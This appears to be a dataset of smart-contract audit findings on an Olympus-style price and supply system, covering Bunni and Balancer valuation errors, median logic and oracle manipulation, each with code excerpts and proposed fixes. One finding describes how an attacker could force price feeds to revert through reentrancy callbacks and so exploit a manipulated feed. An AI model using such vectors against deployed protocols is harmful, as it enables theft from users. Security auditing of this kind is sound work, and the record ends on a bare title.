```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n
Incorrect ProtocolOwnedLiquidityOhm calculation due to inclusion of other user's reserves
high
ProtocolOwnedLiquidityOhm for Bunni can include the liquidity deposited by other users which is not protocol owned\\nThe protocol owned liquidity in Bunni is calculated as the sum of reserves of all the BunniTokens\\n```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n\\nThe deposit function of Bunni allows any user to add liquidity to a token. Hence the returned reserve will contain amounts other than the reserves that actually belong to the protocol\\n```\\n // @audit callable by any user\\n function deposit(\\n DepositParams calldata params\\n )\\n external\\n payable\\n virtual\\n override\\n checkDeadline(params.deadline)\\n returns (uint256 shares, uint128 addedLiquidity, uint256 amount0, uint256 amount1)\\n {\\n }\\n```\\n
Guard the deposit function in BunniHub or compute the liquidity using shares belonging to the protocol
Incorrect assumption of the protocol owned liquidity and hence the supply. An attacker can inflate the liquidity reserves The wider system relies on the supply calculation to be correct in order to perform actions of economical impact
```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n
Incorrect StablePool BPT price calculation
high
Incorrect StablePool BPT price calculation as rate's are not considered\\nThe price of a stable pool BPT is computed as:\\nminimum price among the pool tokens obtained via feeds * return value of `getRate()`\\nThis method is used referring to an old documentation of Balancer\\n```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n\\nThe `getRate()` function returns the exchange `rate` of a BPT to the underlying base asset of the pool which can be different from the minimum market priced asset for pools with `rateProviders`. To consider this, the price obtained from feeds must be divided by the `rate` provided by `rateProviders` before choosing the minimum as mentioned in the previous version of Balancer's documentation.\\n1. Get market price for each constituent token\\nGet market price of wstETH and WETH in terms of USD, using chainlink oracles.\\n2. Get RateProvider price for each constituent token\\nSince wstETH - WETH pool is a MetaStablePool and not a ComposableStablePool, it does not have `getTokenRate()` function. Therefore, it`s needed to get the RateProvider price manually for wstETH, using the rate providers of the pool. The rate provider will return the wstETH token in terms of stETH.\\nNote that WETH does not have a rate provider for this pool. In that case, assume a value of `1e18` (it means, market price of WETH won't be divided by any value, and it's used purely in the minPrice formula).\\n3. Get minimum price\\n$$ minPrice = min({P_{M_{wstETH}} \\over P_{RP_{wstETH}}}, P_{M_{WETH}}) $$\\n4. Calculates the BPT price\\n$$ P_{BPT_{wstETH-WETH}} = minPrice * rate_{pool_{wstETH-WETH}} $$\\nwhere `rate_pool_wstETH-WETH` is `pool.getRate()` of wstETH-WETH pool.\\nExample\\nAt block 18821323: cbeth : 2317.48812 wstEth : 2526.84 pool total supply : 0.273259897168240633 getRate() : 1.022627523581711856 wstRateprovider rate : 1.150725009180224306 cbEthRateProvider rate : 1.058783029570983377 wstEth balance : 0.133842314907166538 cbeth balance : 0.119822100236557012 tvl : (0.133842314907166538 * 2526.84 + 0.119822100236557012 * 2317.48812) == 615.884408812\\naccording to current implementation: bpt price = 2317.48812 * 1.022627523581711856 == 2369.927137086 calculated tvl = bpt price * total supply = 647.606045776\\ncorrect calculation: rate_provided_adjusted_cbeth = (2317.48812 / 1.058783029570983377) == 2188.822502132 rate_provided_adjusted_wsteth = (2526.84 / 1.150725009180224306) == 2195.867804942 bpt price = 2188.822502132 * 1.022627523581711856 == 2238.350134915 calculated tvl = bpt price * total supply = (2238.350134915 * 0.273259897168240633) == 611.651327693
For pools having rate providers, divide prices by rate before choosing the minimum
Incorrect calculation of bpt price. Has possibility to be over and under valued.
```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n
Inconsistency in BunniToken Price Calculation
medium
The deviation check (_validateReserves()) from BunniPrice.sol considers both position reserves and uncollected fees when validating the deviation with TWAP, while the final price calculation (_getTotalValue()) only accounts for position reserves, excluding uncollected fees.\\nThe same is applied to BunniSupply.sol where `getProtocolOwnedLiquidityOhm()` validates reserves + fee deviation from TWAP and then returns only Ohm reserves using `lens_.getReserves(key_)`\\nNote that `BunniSupply.sol#getProtocolOwnedLiquidityReserves()` validates deviation using reserves+fees with TWAP and then return reserves+fees in a good way without discrepancy.\\nBut this could lead to a misalignment between the deviation check and actual price computation.\\nDeviation Check : `_validateReserves` Function:\\n```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n\\nYou can see that the deviation check includes uncollected fees in the `reservesTokenRatio`, potentially leading to a higher or more volatile ratio compared to the historical `twapTokenRatio`.\\nFinal Price Calculation in `BunniPrice.sol#_getTotalValue()` :\\n```\\n function _getTotalValue(\\n BunniToken token_,\\n BunniLens lens_,\\n uint8 outputDecimals_\\n ) internal view returns (uint256) {\\n (address token0, uint256 reserve0, address token1, uint256 reserve1) = _getBunniReserves(\\n token_,\\n lens_,\\n outputDecimals_\\n );\\n uint256 outputScale = 10 ** outputDecimals_;\\n\\n // Determine the value of each reserve token in USD\\n uint256 totalValue;\\n totalValue += _PRICE().getPrice(token0).mulDiv(reserve0, outputScale);\\n totalValue += _PRICE().getPrice(token1).mulDiv(reserve1, outputScale);\\n\\n return totalValue;\\n }\\n```\\n\\nYou can see that this function (_getTotalValue()) excludes uncollected fees in the final valuation, potentially overestimating the total value within deviation check process, meaning the check could pass in certain conditions whereas it could have not pass if fees where not accounted on the deviation check. Moreover the below formula used :\\n$$ price_{LP} = {reserve_0 \\times price_0 + reserve_1 \\times price_1} $$\\nwhere $reserve_i$ is token $i$ reserve amount, $price_i$ is the price of token $i$\\nIn short, it is calculated by getting all underlying balances, multiplying those by their market prices\\nHowever, this approach of directly computing the price of LP tokens via spot reserves is well-known to be vulnerable to manipulation, even if TWAP Deviation is checked, the above summary proved that this method is not 100% bullet proof as there are discrepancy on what is mesured. Taken into the fact that the process to check deviation is not that good plus the fact that methodology used to compute price is bad, the impact of this is high\\nThe same can be found in BunnySupply.sol `getProtocolOwnedLiquidityReserves()` :\\n```\\n function getProtocolOwnedLiquidityReserves()\\n external\\n view\\n override\\n returns (SPPLYv1.Reserves[] memory)\\n {\\n // Iterate through tokens and total up the reserves of each pool\\n uint256 len = bunniTokens.length;\\n SPPLYv1.Reserves[] memory reserves = new SPPLYv1.Reserves[](len);\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniToken token = tokenData.token;\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(token);\\n (\\n address token0,\\n address token1,\\n uint256 reserve0,\\n uint256 reserve1\\n ) = _getReservesWithFees(key, lens);\\n\\n // Validate reserves\\n _validateReserves(\\n key,\\n lens,\\n tokenData.twapMaxDeviationBps,\\n tokenData.twapObservationWindow\\n );\\n\\n address[] memory underlyingTokens = new address[](2);\\n underlyingTokens[0] = token0;\\n underlyingTokens[1] = token1;\\n uint256[] memory underlyingReserves = new uint256[](2);\\n underlyingReserves[0] = reserve0;\\n underlyingReserves[1] = reserve1;\\n\\n reserves[i] = SPPLYv1.Reserves({\\n source: address(token),\\n tokens: underlyingTokens,\\n balances: underlyingReserves\\n });\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n return reserves;\\n }\\n```\\n\\nWhere returned value does not account for uncollected fees whereas deviation check was accounting for it
Align the methodology used in both the deviation check and the final price computation. This could involve either including the uncollected fees in both calculations or excluding them in both.\\nIt's ok for BunniSupply as there are 2 functions handling both reserves and reserves+fees but change deviation check process on the second one to include only reserves when checking deviation twap ratio
`_getTotalValue()` from BunniPrice.sol and `getProtocolOwnedLiquidityReserves()` from BunniSupply.sol have both ratio computation that includes uncollected fees to compare with TWAP ratio, potentially overestimating the total value compared to what these functions are aim to, which is returning only the reserves or LP Prices by only taking into account the reserves of the pool. Meaning the check could pass in certain conditions where fees are included in the ratio computation and the deviation check process whereas the deviation check should not have pass without the fees accounted.
```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n
Price can be miscalculated.
medium
In `SimplePriceFeedStrategy.sol#getMedianPrice` function, when the length of `nonZeroPrices` is 2 and they are deviated it returns first non-zero value, not median value.\\n`SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` is as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n\\nAs you can see above, on L237 it gets the list of non-zero prices. If the length of this list is smaller than 3, it assumes that a median price cannot be calculated and returns first non-zero price. This is wrong. If the number of non-zero prices is 2 and they are deviated, it has to return median value. The `_getMedianPrice` function called on L253 is as follows.\\n```\\n function _getMedianPrice(uint256[] memory prices_) internal pure returns (uint256) {\\n uint256 pricesLen = prices_.length;\\n\\n // If there are an even number of prices, return the average of the two middle prices\\n if (pricesLen % 2 == 0) {\\n uint256 middlePrice1 = prices_[pricesLen / 2 - 1];\\n uint256 middlePrice2 = prices_[pricesLen / 2];\\n return (middlePrice1 + middlePrice2) / 2;\\n }\\n\\n // Otherwise return the median price\\n // Don't need to subtract 1 from pricesLen to get midpoint index\\n // since integer division will round down\\n return prices_[pricesLen / 2];\\n }\\n```\\n\\nAs you can see, the median value can be calculated from two values. This problem exists at `getMedianPrice` function as well.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n
First, `SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` function has to be rewritten as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n- if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n+ if (nonZeroPrices.length < 2) return firstNonZeroPrice;\\n\\n // rest of code\\n }\\n```\\n\\nSecond, `SimplePriceFeedStrategy.sol#getMedianPrice` has to be modified as following.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n- if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n+ if (nonZeroPricesLen < 2) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n
When the length of `nonZeroPrices` is 2 and they are deviated, it returns first non-zero value, not median value. It causes wrong calculation error.
```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n
Price calculation can be manipulated by intentionally reverting some of price feeds.
medium
Price calculation module iterates through available price feeds for the requested asset, gather prices of non-revert price feeds and then apply strategy on available prices to calculate final asset price. By abusing this functionality, an attacker can let some price feeds revert to get advantage from any manipulated price feed.\\nHere we have some methods that attackers can abuse to intentionally revert price feeds.\\nUniswapV3 price feed UniswapV3Price.sol#L210-214\\n```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n\\nIn UniswapV3 price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it from UniswapV3's callback methods.\\nBalancer price feed BalancerPoolTokenPrice.sol#L388 BalancerPoolTokenPrice.sol#487 BalancerPoolTokenPrice.sol#599 BalancerPoolTokenPrice.sol#748\\n```\\n// Prevent re-entrancy attacks\\nVaultReentrancyLib.ensureNotInVaultContext(balVault);\\n```\\n\\nIn BalancerPool price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it in the middle of Balancer action.\\nBunniToken price feed BunniPirce.sol#L155-160\\n```\\n_validateReserves(\\n _getBunniKey(token),\\n lens,\\n params.twapMaxDeviationsBps,\\n params.twapObservationWindow\\n);\\n```\\n\\nIn BunniToken price feed, it validates reserves and reverts if it doesn't satisfy deviation. Since BunniToken uses UniswapV3, this can be intentionally reverted by calling it from UniswapV3's mint callback.\\n\\nUsually for ERC20 token prices, above 3 price feeds are commonly used combined with Chainlink price feed, and optionally with `averageMovingPrice`. There are another two points to consider here:\\nWhen average moving price is used, it is appended at the end of the price array. OlympusPrice.v2.sol#L160\\n```\\nif (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n```\\n\\nIn price calculation strategy, first non-zero price is used when there are 2 valid prices: `getMedianPriceIfDeviation` - SimplePriceFeedStrategy.sol#L246 `getMedianPrice` - SimplePriceFeedStrategy.sol#L313 For `getAveragePrice` and `getAveragePriceIfDeviation`, it uses average price if it deviates.\\n\\nBased on the information above, here are potential attack vectors that attackers would try:\\nWhen Chainlink price feed is manipulated, an attacker can disable all three above price feeds intentionally to get advantage of the price manipulation.\\nWhen Chainlink price feed is not used for an asset, an attacker can manipulate one of above 3 spot price feeds and disable other ones.\\nWhen `averageMovingPrice` is used and average price strategy is applied, the manipulation effect becomes half: $\\frac{(P + \\Delta X) + (P)}{2} = P + \\frac{\\Delta X}{2}, P=Market Price, \\Delta X=Manipulated Amount$
For the cases above that price feeds being intentionally reverted, the price calculation itself also should revert without just ignoring it.
Attackers can disable some of price feeds as they want with ease, they can get advantage of one manipulated price feed.
```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n
getReservesByCategory() when useSubmodules =true and submoduleReservesSelector=bytes4(0) will revert
medium
in `getReservesByCategory()` Lack of check `data.submoduleReservesSelector!=""` when call `submodule.staticcall(abi.encodeWithSelector(data.submoduleReservesSelector));` will revert\\nwhen `_addCategory()` if `useSubmodules==true`, `submoduleMetricSelector` must not empty and `submoduleReservesSelector` can empty (bytes4(0))\\nlike "protocol-owned-treasury"\\n```\\n _addCategory(toCategory("protocol-owned-treasury"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n\\nbut when call `getReservesByCategory()` , don't check `submoduleReservesSelector!=bytes4(0)` and direct call `submoduleReservesSelector`\\n```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n // If category requires data from submodules, count all submodules and their sources.\\n len = (data.useSubmodules) ? submodules.length : 0;\\n\\n// rest of code\\n\\n for (uint256 i; i < len; ) {\\n address submodule = address(_getSubmoduleIfInstalled(submodules[i]));\\n (bool success, bytes memory returnData) = submodule.staticcall(\\n abi.encodeWithSelector(data.submoduleReservesSelector)\\n );\\n```\\n\\nthis way , when call like `getReservesByCategory(toCategory("protocol-owned-treasury")` will revert\\nPOC\\nadd to `SUPPLY.v1.t.sol`\\n```\\n function test_getReservesByCategory_includesSubmodules_treasury() public {\\n _setUpSubmodules();\\n\\n // Add OHM/gOHM in the treasury (which will not be included)\\n ohm.mint(address(treasuryAddress), 100e9);\\n gohm.mint(address(treasuryAddress), 1e18); // 1 gOHM\\n\\n // Categories already defined\\n\\n uint256 expectedBptDai = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_DAI_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n uint256 expectedBptOhm = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_OHM_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n\\n // Check reserves\\n SPPLYv1.Reserves[] memory reserves = moduleSupply.getReservesByCategory(\\n toCategory("protocol-owned-treasury")\\n );\\n }\\n```\\n\\n```\\n forge test -vv --match-test test_getReservesByCategory_includesSubmodules_treasury\\n\\nRunning 1 test for src/test/modules/SPPLY/SPPLY.v1.t.sol:SupplyTest\\n[FAIL. Reason: SPPLY_SubmoduleFailed(0xeb502B1d35e975321B21cCE0E8890d20a7Eb289d, 0x0000000000000000000000000000000000000000000000000000000000000000)] test_getReservesByCategory_includesSubmodules_treasury() (gas: 4774197\\n```\\n
```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n\\n\\n CategoryData memory data = categoryData[category_];\\n uint256 categorySubmodSources;\\n // If category requires data from submodules, count all submodules and their sources.\\n// Remove the line below\\n len = (data.useSubmodules) ? submodules.length : 0;\\n// Add the line below\\n len = (data.useSubmodules && data.submoduleReservesSelector!=bytes4(0)) ? submodules.length : 0;\\n```\\n
some category can't get `Reserves`
```\\n _addCategory(toCategory("protocol-owned-treasury"), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n
Balancer LP valuation methodologies use the incorrect supply metric
medium
